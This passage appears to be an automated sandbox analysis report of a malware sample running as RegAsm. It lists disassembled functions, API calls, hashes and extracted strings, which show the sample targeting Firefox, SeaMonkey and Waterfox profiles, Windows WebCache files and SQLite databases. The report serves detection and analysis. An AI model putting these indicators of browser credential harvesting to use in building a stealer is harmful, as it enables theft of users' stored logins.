                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Waterfox$Waterfox\Profiles
                                                          • API String ID: 1829478387-11920434
                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00403E50
                                                          • memset.MSVCRT ref: 00403E65
                                                          • memset.MSVCRT ref: 00403E7A
                                                          • memset.MSVCRT ref: 00403E8F
                                                          • memset.MSVCRT ref: 00403EA4
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403F6B
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                          • API String ID: 1829478387-2068335096
                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00403FE1
                                                          • memset.MSVCRT ref: 00403FF6
                                                          • memset.MSVCRT ref: 0040400B
                                                          • memset.MSVCRT ref: 00404020
                                                          • memset.MSVCRT ref: 00404035
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 004040FC
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                          • API String ID: 1829478387-3369679110
                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                          • API String ID: 3510742995-2641926074
                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                          Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@CreateErrorFileLast
                                                          • String ID: |A
                                                          • API String ID: 4200628931-1717621600
                                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 004033B7
                                                          • memcpy.MSVCRT ref: 004033D0
                                                          • wcscmp.MSVCRT ref: 004033FC
                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                          • String ID: $0.@
                                                          • API String ID: 3030842498-1896041820
                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 2941347001-0
                                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00403C09
                                                          • memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                          • wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                          • wcscat.MSVCRT ref: 00403C70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcscat$wcscpywcslen
                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                          • API String ID: 2489821370-1174173950
                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040A824
                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                          • wcscpy.MSVCRT ref: 0040A854
                                                          • wcscat.MSVCRT ref: 0040A86A
                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 669240632-0
                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcschr.MSVCRT ref: 00414458
                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                          • String ID: "%s"
                                                          • API String ID: 1343145685-3297466227
                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                          • String ID: GetProcessTimes$kernel32.dll
                                                          • API String ID: 1714573020-3385500049
                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004087D6
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                          • memset.MSVCRT ref: 00408828
                                                          • memset.MSVCRT ref: 00408840
                                                          • memset.MSVCRT ref: 00408858
                                                          • memset.MSVCRT ref: 00408870
                                                          • memset.MSVCRT ref: 00408888
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 2911713577-0
                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp
                                                          • String ID: @ $SQLite format 3
                                                          • API String ID: 1475443563-3708268960
                                                          • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                          • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpqsort
                                                          • String ID: /nosort$/sort
                                                          • API String ID: 1579243037-1578091866
                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E60F
                                                          • memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                          • API String ID: 3354267031-2114579845
                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID:
                                                          • API String ID: 3473537107-0
                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                          • API String ID: 2221118986-1725073988
                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                          Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotificationSleep
                                                          • String ID: }A
                                                          • API String ID: 1821831730-2138825249
                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DeleteObject
                                                          • String ID: r!A
                                                          • API String ID: 1103273653-628097481
                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@
                                                          • String ID:
                                                          • API String ID: 1033339047-0
                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
